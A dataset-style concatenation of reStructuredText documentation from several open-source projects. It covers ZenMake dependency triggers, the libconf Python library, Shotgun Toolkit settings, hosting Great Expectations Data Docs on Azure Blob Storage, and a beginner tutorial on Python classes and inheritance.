.. code-block:: python
'trigger': {
'paths-exist' : '/etc/fstab',
}
'trigger': {
'paths-exist' : ['/etc/fstab', '/tmp/somefile'],
}
'trigger': {
'paths-exist' : dict(
startdir = ../foo-lib,
incl = '**/*.label',
),
}
:paths-dont-exist:
This trigger is the same as ``paths-exist`` but returns True if
configured paths don't exist.
:env:
This trigger returns True only if all configured environment variables
exist and equal to configured values. The format is simple:
it's a ``dict`` where each key is the name of a variable and each value
is the value of that environment variable.
:no-targets:
If it is True, this trigger returns True only if any of the target files
for the current dependency doesn't exist. It can be useful to detect
the need to run the 'build' rule.
This trigger cannot be used in the ZenMake command 'configure'.
:func:
This trigger is a custom python function that must return True or False.
This function gets the following parameters as arguments:
:zmcmd:
It's a name of the current ZenMake command that has been used
to run the rule.
:targets:
A list of configured/detected targets. It can be None if the rule
has been run from the command 'configure'.
It's better to use ``**kwargs`` in this function because new
parameters can be added in the future.
This trigger cannot be used in a YAML buildconf file.
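For example, in a Python buildconf (the function name and the condition are illustrative only):

```python
# Hypothetical trigger function: ZenMake calls it with the current command
# name and the detected target paths; returning True runs the rule.
def need_build(zmcmd, targets, **kwargs):
    # run the rule from the 'build' command whenever no targets were detected
    return zmcmd == 'build' and not targets
```

It could then be referenced in the rule as ``'trigger': { 'func': need_build }`` (hypothetical usage).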
.. note::
For any non-ZenMake dependency there are following
default triggers for rules:
configure: { always: true }
build: { no-targets: true }
Any other rule: { always: false }
.. note::
You can use command line option ``-E``/``--force-edeps`` to run
rules for external dependencies without checking triggers.
:zm-commands:
A list with names of ZenMake commands in which selected rule will be run.
By default each rule can be run in the ZenMake command with the same name only.
For example, rule 'configure' by default can be run with the command
'configure' and rule 'build' with the command 'build', etc.
But here you can set up a different behavior.
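Putting the rule attributes above together, a rule configuration might look like this in YAML format (the commands, directory, timeout and environment variable are illustrative only):

```yaml
rules:
  configure: cmake -S . -B _build
  build:
    cmd: cmake --build _build
    timeout: 600
    env:
      VERBOSE: '1'
    trigger:
      no-targets: true
```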
.. _buildconf-edep-params-buildtypes-map:
buildtypes-map
"""""""""""""""""""""
This parameter is used only for external dependencies which are other
ZenMake projects. By default ZenMake uses the value of the current ``buildtype``
for all such dependencies to run rules, but in some cases the buildtype names
may not match. For example, the current project can have buildtypes
``debug`` and ``release`` while the project from the dependency has
buildtypes ``dbg`` and ``rls``. In this case
Example in YAML format:
.. code-block:: yaml
buildtypes-map:
debug : dbg
release : rls
Example in Python format:
.. code-block:: python
buildtypes-map: {
'debug' : 'dbg',
'release' : 'rls',
}
Some examples can be found in the directory 'external-deps'
in the repository `here <repo_demo_projects_>`_.
| 34.821429 | 89 | 0.595282 |
b7ddd032eb49ee07e08d9997dc29fd7fe78329df | 99 | rst | reStructuredText | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | null | null | null | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | 3 | 2020-01-06T03:03:51.000Z | 2020-06-29T17:29:50.000Z | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | null | null | null | vunits.constants.m\_e
=====================
.. currentmodule:: vunits.constants
.. autodata:: m_e | 16.5 | 35 | 0.575758 |
500a5418b4ff478c68f40684ab01326aacc9651a | 455 | rst | reStructuredText | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | Salt formula for patroni
Based on the Ansible role - https://github.com/imcitius/ansible-pgsql_patroni_cluster
Full guide for a PostgreSQL cluster: https://habrahabr.ru/post/322036/
**It's not finished yet**
TODO:
* haproxy, keepalived, postgres dependencies metadata
* haproxy, keepalived, postgres jinja templating, defining vars
* haproxy, keepalived, postgres dependencies check if installed
* client/server state redefine
**Feel free to advice**
| 19.782609 | 81 | 0.769231 |
a1f3bd5e42530e66b66c1b3885c6248e529ccbe0 | 141 | rst | reStructuredText | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | 1 | 2018-01-19T04:59:57.000Z | 2018-01-19T04:59:57.000Z | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | null | null | null | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | null | null | null | activitystreams.models
======================
.. currentmodule:: activitystreams.models
.. automodule:: activitystreams.models
:members: | 20.142857 | 41 | 0.659574 |
5b09bcf5231a7d9903b1ba968657577e2c4f25a4 | 77 | rst | reStructuredText | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | 2 | 2015-02-20T02:50:07.000Z | 2017-05-02T19:26:42.000Z | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | null | null | null | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | null | null | null | HTTP Client Library for ``DataGator``
=====================================

.. file: doc/sphinx/hardware/mitsubishi.rst (ZLW07/RobWork)

Mitsubishi PA-10
===================

.. file: CHANGELOG.rst (leggedrobotics/robot_markers)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package robot_markers
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

0.2.1 (2018-06-01)
------------------
* Fixed builder when building the whole robot.
* Contributors: Justin Huang

0.2.0 (2018-01-31)
------------------
* Added ability to filter markers to a set of links.
* Added website.
* Update README.md
* Contributors: Justin Huang

0.1.0 (2017-05-25)
------------------
* Initial package creation.
* Contributors: Justin Huang

.. file: install/app_store/tk-framework-shotgunutils/v4.4.15/docs/settings.rst (JoanAzpeitia/lp_sg)

Shotgun Toolkit QT Settings Wrapper
######################################

The settings module makes it easy to store things like user preferences, app related state etc.
For example, if you want your app to remember the state of a checkbox across sessions, you can
use the settings module to store this value. Adding persistent settings to an app can quickly and
drastically improve the user experience at a very low cost.

This settings module wraps around ``QSettings``. This means that the settings data will be stored
on your local machine and that it is for the current user only. If you need to share a preference
or setting between multiple users, this module is most likely *not* the right one to use.

Settings can have different scopes. The scope indicates how the setting should be shared between
instances of apps, Shotgun setups etc. Please note that the setting is still per-user and per-machine,
so if it is scoped to be "global", it means that it will be shared across all different apps, engines,
configurations, projects and Shotgun sites for the current user on their local machine.

- ``SCOPE_GLOBAL`` - No restriction.
- ``SCOPE_SITE`` - Settings are per Shotgun site.
- ``SCOPE_PROJECT`` - Settings are per Shotgun project.
- ``SCOPE_CONFIG`` - Settings are per Shotgun Pipeline Configuration.
- ``SCOPE_INSTANCE`` - Settings are per app or engine instance. For example, if your app
  contains a set of filters, and you want these to be remembered across sessions, you would
  typically use this scope. Each instance of the app will remember its own filters, so when you
  run it in the asset environment, one set of filters is remembered, and when you run it in the shot
  environment, another set of filters, etc.
- ``SCOPE_ENGINE`` - One setting per engine. This makes it possible to store one set of preferences
  for apps running in Photoshop, Maya, Nuke etc. This makes it possible to, for example, store a setting
  that remembers if a "welcome screen" for your app has been displayed - so that it is only displayed
  once in Maya, once in Nuke, etc.

The following code illustrates typical use of the settings module::

    # example of how the settings module can be used within your app code

    # import the module - note that this is using the special
    # import_framework code so it won't work outside an app
    settings = sgtk.platform.import_framework("tk-framework-shotgunutils", "settings")

    # typically in the constructor of your main dialog or in the app, create a settings object:
    self._settings_manager = settings.UserSettings(sgtk.platform.current_bundle())

    # the settings system will handle serialization and management of data types
    # so you can pass simple types such as strings, ints and lists and dicts of these.
    #
    # retrieve a settings value and default to a value if no settings was found
    scale_val = self._settings_manager.retrieve("thumb_size_scale", 140)

    # or store the same value
    self._settings_manager.store("thumb_size_scale", 140)

    # by default, things are scoped with `SCOPE_GLOBAL`.
    # If you want to specify another scope, add a scope parameter.

    # Fetch a preference with a specific scope
    ui_launched = self._settings_manager.retrieve("ui_launched", False, self._settings_manager.SCOPE_ENGINE)

    # And store a preference with a specific scope
    self._settings_manager.store("ui_launched", True, self._settings_manager.SCOPE_ENGINE)

.. file: Misc/NEWS.d/next/Build/2022-01-08-12-43-31.bpo-45925.38F3NO.rst (pepr/cpython)

Update Windows installer to use SQLite 3.37.2.

.. file: README.rst (jaywalker9999/python-libconf)

=======
libconf
=======

libconf is a pure-Python reader/writer for configuration files in `libconfig
format`_, which is often used in C/C++ projects. Its interface is similar to
the `json`_ module: the four main methods are ``load()``, ``loads()``,
``dump()``, and ``dumps()``.

Example usage::

    import io, libconf
    >>> with io.open('example.cfg') as f:
    ...     config = libconf.load(f)

    >>> config
    {'capabilities': {'can-do-arrays': [3, 'yes', True],
                      'can-do-lists': (True,
                                       14880,
                                       ('sublist',),
                                       {'subgroup': 'ok'})},
     'version': 7,
     'window': {'position': {'h': 600, 'w': 800, 'x': 375, 'y': 210},
                'title': 'libconfig example'}}

    >>> config['window']['title']
    'libconfig example'
    >>> config.window.title
    'libconfig example'

    >>> print(libconf.dumps({'size': [10, 15], 'flag': True}))
    flag = True;
    size =
    [
        10,
        15
    ];

The data can be accessed either via indexing (``['title']``) or via attribute
access ``.title``.

Character encoding and escape sequences
---------------------------------------

The recommended way to use libconf is with Unicode objects (``unicode`` on
Python 2, ``str`` on Python 3). Input strings or streams for ``load()`` and
``loads()`` should be Unicode, as should be all strings contained in data
structures passed to ``dump()`` and ``dumps()``.

In ``load()`` and ``loads()``, escape sequences (such as ``\n``, ``\r``,
``\t``, or ``\xNN``) are decoded. Hex escapes (``\xNN``) are mapped to Unicode
characters U+0000 through U+00FF. All other characters are passed through as-is.

In ``dump()`` and ``dumps()``, unprintable characters below U+0080 are escaped
as ``\n``, ``\r``, ``\t``, ``\f``, or ``\xNN`` sequences. Characters U+0080
and above are passed through as-is.
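
The decoding rule can be illustrated with a short pure-Python sketch. Note that this is a simplified illustration of the behavior described above, not libconf's actual implementation, and the helper name ``decode_escapes`` is made up for this example.

```python
import re

# Simplified sketch of the escape decoding described above (not libconf's
# actual code): \xNN maps to U+0000..U+00FF, named escapes decode normally.
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'f': '\f', '\\': '\\', '"': '"'}

def decode_escapes(s):
    def replace(match):
        esc = match.group(1)
        if esc.startswith('x'):
            return chr(int(esc[1:], 16))  # hex escape: U+0000 through U+00FF
        return _SIMPLE.get(esc, esc)      # other characters pass through as-is
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', replace, s)

print(decode_escapes(r'line1\nline2 \x41'))  # \x41 is 'A' (U+0041)
```

Running the sketch on the raw string above yields two lines of output, with the hex escape decoded to ``A``.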

Writing libconfig files
-----------------------

Reading libconfig files is easy. Writing is made harder by two factors:

* libconfig's distinction between `int and int64`_: ``2`` vs. ``2L``
* libconfig's distinction between `lists`_ and `arrays`_, and
  the limitations on arrays

The first point concerns writing Python ``int`` values. Libconf dumps values
that fit within the C/C++ 32-bit ``int`` range without an "L" suffix. For larger
values, an "L" suffix is automatically added. To force the addition of an "L"
suffix even for numbers within the 32-bit integer range, wrap the integer in a
``LibconfInt64`` class.

Examples::

    dumps({'value': 2})               # Returns "value = 2;"
    dumps({'value': 2**32})           # Returns "value = 4294967296L;"
    dumps({'value': LibconfInt64(2)}) # Explicit int64, returns "value = 2L;"
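
To make the cutoff concrete, here is a rough pure-Python sketch of the suffix rule. This is an illustration only, not libconf's actual code; ``format_int`` is a made-up helper name.

```python
# Sketch of the "L" suffix rule: values outside the signed 32-bit range,
# or values explicitly flagged as int64, get the suffix.
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

def format_int(value, force_int64=False):
    needs_suffix = force_int64 or not (INT32_MIN <= value <= INT32_MAX)
    return '%d%s' % (value, 'L' if needs_suffix else '')

print(format_int(2))                    # 2
print(format_int(2**32))                # 4294967296L
print(format_int(2, force_int64=True))  # 2L
```

The ``force_int64`` flag plays the role of wrapping a value in ``LibconfInt64``.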

The second complication arises from the distinction between `lists`_ and
`arrays`_ in the libconfig language. Lists are enclosed by ``()`` parentheses,
and can contain arbitrary values within them. Arrays are enclosed by ``[]``
brackets, and have significant limitations: all values must be scalar (int,
float, bool, string) and must be of the same type.

Libconf uses the following convention:

* it maps libconfig ``()``-lists to Python tuples, which also use the ``()``
  syntax.
* it maps libconfig ``[]``-arrays to Python lists, which also use the ``[]``
  syntax.

This provides nice symmetry between the two languages, but has the drawback
that dumping Python lists inherits the limitations of libconfig's arrays.

To explicitly control whether lists or arrays are dumped, wrap the Python
list/tuple in a ``LibconfList`` or ``LibconfArray``.

Examples::

    # Libconfig lists (=Python tuples) can contain arbitrary complex types:
    dumps({'libconf_list': (1, True, {})})

    # Libconfig arrays (=Python lists) must contain scalars of the same type:
    dumps({'libconf_array': [1, 2, 3]})

    # Equivalent, but more explicit by using LibconfList/LibconfArray:
    dumps({'libconf_list': LibconfList([1, True, {}])})
    dumps({'libconf_array': LibconfArray([1, 2, 3])})

Comparison to other Python libconfig libraries
----------------------------------------------

`Pylibconfig2`_ is another pure-Python libconfig reader. Its API
is based on the C++ interface, instead of the Python `json`_ module.
It's licensed under GPLv3, which makes it unsuitable for use in a large number
of projects.

`Python-libconfig`_ is a library that provides Python bindings for the
libconfig++ C++ library. While permissively licensed (BSD), it requires a
compilation step upon installation, which can be a drawback.

I wrote libconf (this library) because both of the existing libraries didn't
fit my requirements. I had a work-related project which is not open source
(ruling out pylibconfig2) and I didn't want the deployment headache of
python-libconfig. Further, I enjoy writing parsers and this seemed like a nice
opportunity :-)

Release notes
-------------

* **2.0.1**, released on 2019-11-21

  - Allow trailing commas in lists and arrays for improved compatibility
    with the libconfig C implementation. Thanks to nibua-r for reporting
    this issue.

* **2.0.0**, released on 2018-11-23

  - Output validation for ``dump()`` and ``dumps()``: raise an exception when
    dumping data that can not be read by the C libconfig implementation.
    *This change may raise exceptions on code that worked with <2.0.0!*
  - Add ``LibconfList``, ``LibconfArray``, ``LibconfInt64`` classes for
    more fine-grained control of the ``dump()``/``dumps()`` output.
  - Fix ``deepcopy()`` of ``AttrDict`` classes (thanks AnandTella).

* **1.0.1**, released on 2017-01-06

  - Drastically improve performance when reading larger files
  - Several smaller improvements and fixes

* **1.0.0**, released on 2016-10-26

  - Add the ability to write libconf files (``dump()`` and ``dumps()``,
    thanks clarkli86 and eatsan)
  - Several smaller improvements and fixes

* **0.9.2**, released on 2016-09-09

  - Fix compatibility with Python versions older than 2.7.6 (thanks AnandTella)

.. _libconfig format: http://www.hyperrealm.com/libconfig/libconfig_manual.html#Configuration-Files
.. _json: https://docs.python.org/3/library/json.html
.. _lists: https://hyperrealm.github.io/libconfig/libconfig_manual.html#Lists
.. _arrays: https://hyperrealm.github.io/libconfig/libconfig_manual.html#Arrays
.. _int and int64: https://hyperrealm.github.io/libconfig/libconfig_manual.html#g_t64_002dbit-Integer-Values
.. _Pylibconfig2: https://github.com/heinzK1X/pylibconfig2
.. _Python-libconfig: https://github.com/cnangel/python-libconfig

.. file: docs/guides/how_to_guides/configuring_data_docs/how_to_host_and_share_data_docs_on_azure_blob_storage.rst (markovml/great_expectations)

.. _how_to_guides__configuring_data_docs__how_to_host_and_share_data_docs_on_azure_blob_storage:

How to host and share Data Docs on Azure Blob Storage
=====================================================

This guide will explain how to host and share Data Docs on Azure Blob Storage.
Data Docs will be served using an Azure Blob Storage static website with restricted access.

.. admonition:: Prerequisites: This how-to guide assumes you have already:

    - :ref:`Set up a working deployment of Great Expectations <tutorials__getting_started>`
    - Have permission to create and configure an Azure `storage account <https://docs.microsoft.com/en-us/azure/storage>`_

**Steps**

1. **Create an Azure Blob Storage static website.**

   - Create a `storage account <https://docs.microsoft.com/en-us/azure/storage>`_.
   - In Settings, select `Static website <https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-static-website-host>`_ to display the configuration page for static websites.
   - Select **Enabled** to enable static website hosting for the storage account.
   - Write "index.html" in Index document.

   Note the Primary endpoint URL. Your team will be able to view your Data Docs at this URL when you have finished this guide. You could also map a custom domain to this endpoint.

   A container called ``$web`` should have been created in your storage account.

2. **Configure the** ``config_variables.yml`` **file with your Azure Storage credentials.**

   Get the `Connection string <https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal>`_ of the storage account you have just created.

   We recommend that Azure Storage credentials be stored in the ``config_variables.yml`` file, which is located in the ``uncommitted/`` folder by default, and is not part of source control. The following lines add Azure Storage credentials under the key ``AZURE_STORAGE_CONNECTION_STRING``. Additional options for configuring the ``config_variables.yml`` file or additional environment variables can be found `here <https://docs.greatexpectations.io/en/latest/guides/how_to_guides/configuring_data_contexts/how_to_use_a_yaml_file_or_environment_variables_to_populate_credentials.html>`_.

   .. code-block:: yaml

       AZURE_STORAGE_CONNECTION_STRING: "DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net;AccountName=<YOUR-STORAGE-ACCOUNT-NAME>;AccountKey=<YOUR-STORAGE-ACCOUNT-KEY==>"

3. **Add a new Azure site to the** ``data_docs_sites`` **section of your** ``great_expectations.yml``.

   .. code-block:: yaml

       data_docs_sites:
         local_site:
           class_name: SiteBuilder
           show_how_to_buttons: true
           store_backend:
             class_name: TupleFilesystemStoreBackend
             base_directory: uncommitted/data_docs/local_site/
           site_index_builder:
             class_name: DefaultSiteIndexBuilder
         az_site:  # this is a user-selected name - you may select your own
           class_name: SiteBuilder
           store_backend:
             class_name: TupleAzureBlobStoreBackend
             container: \$web
             connection_string: ${AZURE_STORAGE_CONNECTION_STRING}
           site_index_builder:
             class_name: DefaultSiteIndexBuilder

   You may also replace the default ``local_site`` if you would only like to maintain a single Azure Data Docs site.

   .. note::
       Since the container is called ``$web``, if we simply set ``container: $web`` in ``great_expectations.yml`` then Great Expectations would unsuccessfully try to find a variable called ``web`` in ``config_variables.yml``.
       We use an escape character ``\`` before the ``$`` so the `substitute_config_variable <https://docs.greatexpectations.io/en/latest/autoapi/great_expectations/data_context/util/index.html?highlight=substitute_config_variable#great_expectations.data_context.util.substitute_config_variable>`_ method will allow us to reach the ``$web`` container.

   You may also configure Great Expectations to store your expectations and validations in this Azure Storage account.
   You can follow the documentation from the guides :ref:`for expectations <how_to_guides__configuring_metadata_stores__how_to_configure_an_expectation_store_in_azure_blob_storage>` and :ref:`validations <how_to_guides__configuring_metadata_stores__how_to_configure_a_validation_result_store_in_azure_blob_storage>`, but ensure you set ``container: \$web`` in place of the other container name.

4. **Build the Azure Blob Data Docs site.**

   You can create or modify a suite, and this will build the Data Docs website.
   Or you can use the following CLI command: ``great_expectations docs build --site-name az_site``.

   .. code-block:: bash

       > great_expectations docs build --site-name az_site

       The following Data Docs sites will be built:
        - az_site: https://<your-storage-account>.blob.core.windows.net/$web/index.html

       Would you like to proceed? [Y/n]: y

       Building Data Docs...

       Done building Data Docs

   If successful, the CLI will provide the object URL of the index page.
   You may secure access to your website using an IP filtering mechanism.

5. **Limit access to your company.**

   - On your Azure Storage Account settings, click on **Networking**
   - Allow access from **Selected networks**
   - You can add access to a Virtual Network
   - You can add IP ranges to the firewall

   More details are available `here <https://docs.microsoft.com/en-us/azure/storage/common/storage-network-security?tabs=azure-portal>`_.

.. discourse::
   :topic_identifier: 231

.. file: docs/source/loading-module.rst (Fratorhe/micropyro)

===============
Loading Module
===============

Start by importing micropyro (use the abbreviation :code:`mp` to look fancy).

.. code-block:: python

    import micropyro as mp
| 14.666667 | 73 | 0.590909 |
ad97ff221507af08ebe36b45456a00912fcb58c4 | 100 | rst | reStructuredText | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 8 | 2021-05-10T23:12:14.000Z | 2022-02-23T06:54:31.000Z | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 13 | 2021-06-01T05:31:17.000Z | 2022-03-25T22:24:18.000Z | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 1 | 2021-06-01T05:24:52.000Z | 2021-06-01T05:24:52.000Z | babycat.WaveformNamedResult
===========================

.. autoclass:: babycat.WaveformNamedResult
| 20 | 42 | 0.61 |
c341cd4761f2ddbdeafc6592f30e121a1e4f1624 | 207 | rst | reStructuredText | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | basically, to send the command ``set_pixel`` to a peripheral listening at channel ``channel1`` with the arguments ``3, 3, 5``
``digiline_send("channel1", {"set_pixel",3,3,5})`` on a connected luacontroller
| 51.75 | 125 | 0.724638 |
cccfe5eba7f197a0a5994325fdb36d9a53d5ce1f | 157 | rst | reStructuredText | AUTHORS.rst | browniebroke/django-acme | 2e583af980b7969d832d2799ac24f1ac3c6fe36a | [
"MIT"
] | 1 | 2021-02-06T11:13:08.000Z | 2021-02-06T11:13:08.000Z | AUTHORS.rst | adamchainz/django-codemod | 6ab6641568bd3c4a34fd52519ba0d6e926030f44 | [
"MIT"
] | 1 | 2016-12-16T18:44:33.000Z | 2016-12-16T18:44:33.000Z | AUTHORS.rst | adamchainz/django-codemod | 6ab6641568bd3c4a34fd52519ba0d6e926030f44 | [
"MIT"
] | 1 | 2021-02-20T10:29:16.000Z | 2021-02-20T10:29:16.000Z | =======
Credits
=======

Development Lead
----------------

* Bruno Alla <alla.brunoo@gmail.com>

Contributors
------------

None yet. Why not be the first?

.. file: chapter/object.rst (Nekroze/codeforthought)

The Object of my Desire
=======================

Now we have data that we can store and functions to easily and repeatably
manipulate that data, but sometimes it is not enough. Many programming languages
use a paradigm called Object Oriented Programming (commonly referred to as
:term:`OOP`) that allows us to do many cool and complex things in a relatively
elegant way.

The primary feature of :term:`OOP` is... you guessed it, Objects. An object is a named
collection of variables that is used as a template to create a data structure
that performs as specified on demand.

This may sound quite complicated but it just needs to be explained better.
Objects are a great way of conceptualizing real world objects in programming.

Say we wanted to create a representation of a cube in our code. We could use
collection data types like a dictionary or some such to store the data about
our cube. What would be even better, however, is to create an object that
defines how a cube should act and what kind of data it would store.

The first thing that needs to be done is to think about what kind of data we
want to store. A cube should have at least a size variable to store,
well, its size. Because we are defining a cube and each side should have the
exact same length we can use one size variable for all of the sides. This is a
fine representation of a cube, albeit very simplistic. Let's also decide we want
to store its position in a three dimensional space. For this we simply need to
store an X, Y and Z variable to describe its position.

Now enough theory, let's have a look at this object in some real code, namely
:term:`Python`.

.. doctest::

    >>> class Cube(object):
    ...     def __init__(self):
    ...         self.size = 0
    ...         self.posx = 0
    ...         self.posy = 0
    ...         self.posz = 0

    >>> companion = Cube()
    >>> companion.size = 10
    >>> companion.size
    10

OK, some basic things to get out of the way. In :term:`Python`, objects should inherit
from the base object; this is why after we name our new "class" (the common name
for an object definition) we place ``(object)`` to denote that this class acts
like an object.

Objects often have "constructors" and sometimes "destructors". These are
functions (or "methods" as they are called when they are part of an object's
definition) that are called when, you guessed it again, the object is
constructed and/or destroyed.

Also, often when defining classes/objects and their methods we use the
terms ``self`` or ``this`` to mean this instance of an object.

In the above example we use the :term:`Python` object constructor ``__init__``
that takes an object instance as an argument (``self``) and will give its
variables their default values, in this case the integer ``0``.

Next we assign the variable `companion` as a new instance of the `Cube`
object by calling the object as if it were a function. Finally we set the
`size` variable of our new `Cube` object to ``10`` and show that the
change worked.

Now we can create any number of `Cube` objects, each with their own values, by
creating a new instance just as we did above with `companion`.

Other languages employ different methods and keywords for using and creating
objects, classes, instances, etc., and these are usually very easy to find on the web.

The Layer Cake
--------------

Another very useful feature of :term:`OOP` is Inheritance. What this means is that one
object definition can be based on another, taking all its variables and methods
and building on top of them.

Let's just go straight to an example this time.

.. doctest::

    >>> class InSpace(object):
    ...     def __init__(self, posx=0, posy=0, posz=0):
    ...         self.posx = posx
    ...         self.posy = posy
    ...         self.posz = posz

    >>> class Cube(InSpace):
    ...     def __init__(self, size, posx=0, posy=0, posz=0):
    ...         super(Cube, self).__init__(posx, posy, posz)
    ...         self.size = size

    >>> destination = InSpace(1, posz=5)
    >>> destination.posx
    1
    >>> destination.posy
    0

    >>> companion = Cube(10)
    >>> companion.posx
    0

This time we are doing things a little differently.

We start off with something similar to before; we are just creating a new class to
define things that exist in a three dimensional space. However, here we are
using default arguments to allow the constructor to optionally take the
position of an `InSpace` object only if it is given, otherwise that dimension
will be ``0``.

Next we define a new `Cube` object, this time instead of inheriting directly
from `object` we inherit from `InSpace`. This means that our new object will
have everything that `InSpace` has and can be used anywhere an `InSpace` object
is expected. For this object's constructor we tell it that we want the size
argument to be required and the position arguments to default to ``0``
upon creation/initialization of this object.

In some languages, :term:`Python` included, you will need to explicitly call the
constructor of the "parent" object if you want it to be executed. :term:`Python`
uses the ``super`` function to make this a bit easier. In :term:`Python` 3 it is
even easier, as ``super`` can be called with no arguments to do exactly the same
thing as above, but people are still using both so I show what works
everywhere.

This is more language specific rather than general programming and so is not
something I will go into too deeply. Suffice to say that above we use ``super``
to get the object definition of the parent of `Cube` and then call its
constructor appropriately.

After we have defined our object hierarchy I have just shown some example usages
of both classes, including different ways to use the optional positional
arguments.

The Method to my Madness
------------------------

Now we can go about doing cooler things like giving special methods that only
cubes can use or, even better, adding methods to `InSpace` that allow every
object definition that inherits it to easily move around without having to
update its "children" such as `Cube`. In fact, let's do just that!

Using the above example, again, any changes in the code to the `InSpace` class
will be reflected in any class that inherits from it (its children)
accordingly. Because of this we can easily abstract the concepts behind a class
into its base components. So if everything exists in a three dimensional space it
might be a good idea to implement things specific to being in such a space in a
class such as `InSpace` so each object that derives from it does not have to
implement such things over and over again. This leaves each object inheriting
from `InSpace` to focus on what it specifically needs to accomplish its job.

With this in mind let us redefine the `InSpace` class with some methods to help
us move around in a space.

.. testcode::

    class InSpace(object):
        def __init__(self, posx=0, posy=0, posz=0):
            self.posx = posx
            self.posy = posy
            self.posz = posz

        def move_x(self, distance):
            self.posx += distance

        def move_y(self, distance):
            self.posy += distance

        def move_z(self, distance):
            self.posz += distance

With this as our new base class we can use the ``move_`` methods from any
object that inherits from `InSpace`.

This means that we can use the `Cube` class as it was defined above and do
``companion.move_x(10)`` to move ``10`` units forward in space and
``companion.move_x(-10)`` to move ``10`` units backwards. Note that in the
function call to move backwards we use ``-10`` for a specific reason.

We could have a method for moving forwards and backwards on each axis but that
may get a little messy. Instead we use a more general approach. When we add the
distance to a variable we use the ``+=`` operator, which adds ``distance`` to
the current value of the variable on the left and then stores the result in the
same place. Basically the final two statements are identical.

.. doctest::

    >>> position = 0
    >>> position = position + 10
    >>> position += 10

Now comes the part that we abuse to make the movement three simple methods
instead of six. When you add a negative number (``-10`` in our case) to another
number it will actually perform a subtraction. By using this we can just
hand the move methods positive numbers when we want to move forward on that
axis and a negative integer when we want to move backwards. Neat, huh!
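
Putting the trick together with a trimmed copy of the `InSpace` class (repeated here so the snippet runs on its own):

```python
class InSpace(object):
    def __init__(self, posx=0, posy=0, posz=0):
        self.posx = posx
        self.posy = posy
        self.posz = posz

    def move_x(self, distance):
        self.posx += distance

cube = InSpace()
cube.move_x(10)   # move forward 10 units
cube.move_x(-10)  # move backward: adding -10 subtracts 10
print(cube.posx)  # back where we started: 0
```

One method per axis handles both directions, just by the sign of the argument.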

This Isn't Even my Final Form
-----------------------------

It doesn't end here. Depending on your needs and what your language of choice
provides, you can create powerful base classes and object hierarchies or even
interfaces that you can use to make your code easily re-usable and even
extendable.

Some languages allow a class to inherit from multiple classes at once. In
statically typed languages there is often :term:`Templating`, which allows
you to make a generic class that can be used with any object type. There are
very few problems that cannot be solved using an :term:`OOP` approach.
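
As a quick taste, here is a minimal sketch of multiple inheritance in Python, reusing the cube idea from this chapter. The `HasSize` class is invented just for this illustration.

```python
class HasSize(object):
    def __init__(self, size=0):
        self.size = size

class InSpace(object):
    def __init__(self, posx=0, posy=0, posz=0):
        self.posx = posx
        self.posy = posy
        self.posz = posz

# Cube inherits from *both* classes at once and can be used wherever
# either a HasSize or an InSpace object is expected.
class Cube(HasSize, InSpace):
    def __init__(self, size, posx=0, posy=0, posz=0):
        HasSize.__init__(self, size)
        InSpace.__init__(self, posx, posy, posz)

companion = Cube(10, posz=5)
print(companion.size, companion.posz)  # 10 5
```

Each parent contributes its own variables, and `Cube` simply wires their constructors together.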

It sounds complex but this can be super helpful. However, just the basics
outlined here are more than enough to get you into the world of :term:`OOP` and open up
a lot of possibilities for better code.

.. file: src/docs/sphinx/quick_start.rst (kant/conduit)

.. ############################################################################
.. # Copyright (c) 2014-2019, Lawrence Livermore National Security, LLC.
.. #
.. # Produced at the Lawrence Livermore National Laboratory
.. #
.. # LLNL-CODE-666778
.. #
.. # All rights reserved.
.. #
.. # This file is part of Conduit.
.. #
.. # For details, see: http://software.llnl.gov/conduit/.
.. #
.. # Please also read conduit/LICENSE
